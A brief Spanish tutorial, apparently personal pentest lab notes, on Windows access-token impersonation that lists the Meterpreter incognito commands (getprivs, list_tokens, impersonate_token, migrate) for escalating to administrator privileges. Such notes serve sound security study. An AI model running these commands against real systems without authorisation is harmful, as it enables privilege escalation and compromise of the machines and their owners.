Access Token Impersonation

La suplantación de token de acceso ocurre cuando un atacante obtiene acceso no autorizado usando un token

En primer lugar, visualizamos privilegios asignados (getprivs), para poder llevar a cabo esta explotación

Si en la lista vemos : SeImpersonatrePrivilege significa que podemos continuar

Cargamos una sesion de incogito en meterpreter: load incognito

Listamos tokens: list_tokens -u

Esto nos dara una lista como por ejemplo: ATTACKDEFENSE\Administrator

Impersonamos el token: impersonate_token “<token>” (IMPORTANTE LAS COMILLAS)

Ahora migramos al proceso explorer y disponemos de privilegios elevados

pgrep explorer
migrate <PID>
getprivs

Última actualización